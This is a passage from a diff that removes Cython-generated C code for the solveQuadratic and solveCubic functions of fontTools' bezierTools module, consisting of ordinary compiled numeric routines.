831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_DD = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":832 - * # We have a true quadratic equation. 
Apply the quadratic formula to find two roots. - * DD = b * b - 4.0 * a * c - * if DD >= 0.0: # <<<<<<<<<<<<<< - * rDD = sqrt(DD) - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] - */ - __pyx_t_2 = PyObject_RichCompare(__pyx_v_DD, __pyx_float_0_0, Py_GE); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 832, __pyx_L1_error) - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 832, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":833 - * DD = b * b - 4.0 * a * c - * if DD >= 0.0: - * rDD = sqrt(DD) # <<<<<<<<<<<<<< - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] - * else: - */ - __Pyx_INCREF(__pyx_v_sqrt); - __pyx_t_3 = __pyx_v_sqrt; __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_DD}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 833, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_rDD = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":834 - * if DD >= 0.0: - * rDD = sqrt(DD) - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] # <<<<<<<<<<<<<< - * else: - * # complex roots, ignore - */ - __pyx_t_2 = PyNumber_Negative(__pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Add(__pyx_t_2, __pyx_v_rDD); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - 
__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_3, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Negative(__pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_rDD); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_v_a); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyList_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_t_3)) __PYX_ERR(0, 834, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_t_1)) __PYX_ERR(0, 834, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_v_roots = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":832 - * # We have a true quadratic equation. Apply the quadratic formula to find two roots. 
- * DD = b * b - 4.0 * a * c - * if DD >= 0.0: # <<<<<<<<<<<<<< - * rDD = sqrt(DD) - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] - */ - goto __pyx_L5; - } - - /* "fontTools/misc/bezierTools.py":837 - * else: - * # complex roots, ignore - * roots = [] # <<<<<<<<<<<<<< - * return roots - * - */ - /*else*/ { - __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 837, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_v_roots = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - } - __pyx_L5:; - } - __pyx_L3:; - - /* "fontTools/misc/bezierTools.py":838 - * # complex roots, ignore - * roots = [] - * return roots # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_roots); - __pyx_r = __pyx_v_roots; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_roots); - __Pyx_XDECREF(__pyx_v_DD); - __Pyx_XDECREF(__pyx_v_rDD); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_49solveCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_48solveCubic, "solveCubic(a, b, c, d)\nSolve a cubic equation.\n\n Solves *a*x*x*x + b*x*x + c*x + d = 0* where a, b, c and d are real.\n\n Args:\n a: coefficient of *x\302\263*\n b: coefficient of *x\302\262*\n c: coefficient of *x*\n d: constant term\n\n Returns:\n A list of roots. Note that the returned list is neither guaranteed to\n be sorted nor to contain unique values!\n\n Examples::\n\n >>> solveCubic(1, 1, -6, 0)\n [-3.0, -0.0, 2.0]\n >>> solveCubic(-10.0, -9.0, 48.0, -29.0)\n [-2.9, 1.0, 1.0]\n >>> solveCubic(-9.875, -9.0, 47.625, -28.75)\n [-2.911392, 1.0, 1.0]\n >>> solveCubic(1.0, -4.5, 6.75, -3.375)\n [1.5, 1.5, 1.5]\n >>> solveCubic(-12.0, 18.0, -9.0, 1.50023651123)\n [0.5, 0.5, 0.5]\n >>> solveCubic(\n ... 9.0, 0.0, 0.0, -7.62939453125e-05\n ... 
) == [-0.0, -0.0, -0.0]\n True\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_49solveCubic = {"solveCubic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_49solveCubic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_48solveCubic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_49solveCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_d = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("solveCubic (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = 
__Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, 1); __PYX_ERR(0, 841, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, 2); __PYX_ERR(0, 841, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, 3); __PYX_ERR(0, 841, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "solveCubic") < 0)) __PYX_ERR(0, 841, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - 
__pyx_v_d = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 841, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_48solveCubic(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_48solveCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { - PyObject *__pyx_v_a1 = NULL; - PyObject *__pyx_v_a2 = NULL; - PyObject *__pyx_v_a3 = NULL; - PyObject *__pyx_v_Q = NULL; - PyObject *__pyx_v_R = NULL; - PyObject *__pyx_v_R2 = NULL; - PyObject *__pyx_v_Q3 = NULL; - PyObject *__pyx_v_R2_Q3 = NULL; - PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_theta = NULL; - PyObject *__pyx_v_rQ2 = NULL; - PyObject *__pyx_v_a1_3 = NULL; - PyObject *__pyx_v_x0 = NULL; - PyObject *__pyx_v_x1 = NULL; - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - int __pyx_t_5; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - double __pyx_t_8; - double __pyx_t_9; - PyObject *__pyx_t_10 = NULL; - PyObject 
*__pyx_t_11 = NULL; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("solveCubic", 0); - __Pyx_INCREF(__pyx_v_a); - - /* "fontTools/misc/bezierTools.py":879 - * # found at: http://www.strangecreations.com/library/snippets/Cubic.C - * # - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * # don't just test for zero; for very small values of 'a' solveCubic() - * # returns unreliable results, so we fall back to quad. - */ - __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_v_a); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 879, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":882 - * # don't just test for zero; for very small values of 'a' solveCubic() - * # returns unreliable results, so we fall back to quad. 
- * return solveQuadratic(b, c, d) # <<<<<<<<<<<<<< - * a = float(a) - * a1 = b / a - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 882, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_1, __pyx_v_b, __pyx_v_c, __pyx_v_d}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 3+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 882, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":879 - * # found at: http://www.strangecreations.com/library/snippets/Cubic.C - * # - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * # don't just test for zero; for very small values of 'a' solveCubic() - * # returns unreliable results, so we fall back to quad. - */ - } - - /* "fontTools/misc/bezierTools.py":883 - * # returns unreliable results, so we fall back to quad. 
- * return solveQuadratic(b, c, d) - * a = float(a) # <<<<<<<<<<<<<< - * a1 = b / a - * a2 = c / a - */ - __pyx_t_3 = __Pyx_PyNumber_Float(__pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 883, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_a, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":884 - * return solveQuadratic(b, c, d) - * a = float(a) - * a1 = b / a # <<<<<<<<<<<<<< - * a2 = c / a - * a3 = d / a - */ - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_v_b, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 884, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a1 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":885 - * a = float(a) - * a1 = b / a - * a2 = c / a # <<<<<<<<<<<<<< - * a3 = d / a - * - */ - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_v_c, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 885, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":886 - * a1 = b / a - * a2 = c / a - * a3 = d / a # <<<<<<<<<<<<<< - * - * Q = (a1 * a1 - 3.0 * a2) / 9.0 - */ - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_v_d, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 886, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_a3 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":888 - * a3 = d / a - * - * Q = (a1 * a1 - 3.0 * a2) / 9.0 # <<<<<<<<<<<<<< - * R = (2.0 * a1 * a1 * a1 - 9.0 * a1 * a2 + 27.0 * a3) / 54.0 - * - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_a1, __pyx_v_a1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_float_3_0, __pyx_v_a2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); 
__pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_9_0, 9.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 888, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_v_Q = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":889 - * - * Q = (a1 * a1 - 3.0 * a2) / 9.0 - * R = (2.0 * a1 * a1 * a1 - 9.0 * a1 * a2 + 27.0 * a3) / 54.0 # <<<<<<<<<<<<<< - * - * R2 = R * R - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_float_2_0, __pyx_v_a1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Multiply(__pyx_t_2, __pyx_v_a1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_1, __pyx_v_a1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Multiply(__pyx_float_9_0, __pyx_v_a1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_v_a2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_float_27_0, __pyx_v_a3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_2, __pyx_float_54_0, 54.0, 0, 0); if 
(unlikely(!__pyx_t_3)) __PYX_ERR(0, 889, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_R = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":891 - * R = (2.0 * a1 * a1 * a1 - 9.0 * a1 * a2 + 27.0 * a3) / 54.0 - * - * R2 = R * R # <<<<<<<<<<<<<< - * Q3 = Q * Q * Q - * R2 = 0 if R2 < epsilon else R2 - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_R, __pyx_v_R); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 891, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_R2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":892 - * - * R2 = R * R - * Q3 = Q * Q * Q # <<<<<<<<<<<<<< - * R2 = 0 if R2 < epsilon else R2 - * Q3 = 0 if abs(Q3) < epsilon else Q3 - */ - __pyx_t_3 = PyNumber_Multiply(__pyx_v_Q, __pyx_v_Q); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 892, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_v_Q); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 892, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_Q3 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":893 - * R2 = R * R - * Q3 = Q * Q * Q - * R2 = 0 if R2 < epsilon else R2 # <<<<<<<<<<<<<< - * Q3 = 0 if abs(Q3) < epsilon else Q3 - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 893, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyObject_RichCompare(__pyx_v_R2, __pyx_t_3, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 893, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 893, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_4) { - __Pyx_INCREF(__pyx_int_0); - __pyx_t_2 = __pyx_int_0; - } else { - __Pyx_INCREF(__pyx_v_R2); - __pyx_t_2 = __pyx_v_R2; - } - __Pyx_DECREF_SET(__pyx_v_R2, __pyx_t_2); - __pyx_t_2 = 0; - - /* 
"fontTools/misc/bezierTools.py":894 - * Q3 = Q * Q * Q - * R2 = 0 if R2 < epsilon else R2 - * Q3 = 0 if abs(Q3) < epsilon else Q3 # <<<<<<<<<<<<<< - * - * R2_Q3 = R2 - Q3 - */ - __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_v_Q3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = PyObject_RichCompare(__pyx_t_1, __pyx_t_3, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 894, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_4) { - __Pyx_INCREF(__pyx_int_0); - __pyx_t_2 = 